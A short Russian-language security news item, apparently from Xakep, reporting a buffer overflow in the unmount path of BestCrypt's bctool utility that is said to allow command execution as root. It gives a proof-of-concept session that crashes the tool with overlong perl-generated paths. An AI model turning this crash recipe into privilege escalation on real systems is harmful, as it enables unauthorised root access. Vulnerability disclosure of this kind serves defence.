Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
BestCrypt – Linux-овая и Windows
утилита для шифрования файловой системы.
При монтировании зашифрованного
контейнера программные пути проверяются,
однако при размонтировании – нет и именно
тут и можно переполнить один из буферов и
выполнить команды от root-а.
Пример:
foo:~ > mkdir /`perl -e 'print
"a"x255'`/`perl -e 'print "a"x255'`
foo:~ > bctool mount test.jbc /`perl -e 'print "a"x255'`/`perl -e 'print
"a"x255'`
Enter password:
foo:~ > ,b>bctool umount /`perl -e 'print "a"x255'`/`perl -e 'print
"a"x255'`
Segmentation fault
foo:~ >